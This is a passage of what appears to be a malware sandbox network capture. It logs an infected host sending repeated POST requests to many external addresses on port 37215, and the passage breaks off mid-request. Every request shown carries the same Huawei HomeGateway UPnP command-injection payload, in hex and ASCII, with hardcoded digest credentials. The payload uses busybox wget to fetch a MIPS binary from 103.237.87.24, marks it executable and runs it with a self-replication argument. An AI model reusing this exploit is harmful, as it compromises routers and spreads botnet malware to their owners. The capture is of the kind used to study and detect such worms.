2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1319192.168.2.1335440157.31.204.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455312967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1320192.168.2.1354222182.24.21.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455319881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1321192.168.2.1339866197.167.14.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455333948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1322192.168.2.134573241.20.5.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455348969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1323192.168.2.1350002157.58.153.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455432892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1324192.168.2.1335352157.106.42.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455435991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1325192.168.2.134515289.159.166.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455945015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1326192.168.2.1340796157.84.114.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.455950975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1327192.168.2.1352370157.41.64.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456202030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1328192.168.2.1347250157.24.229.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456202030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1329192.168.2.1360850200.70.98.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456248045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
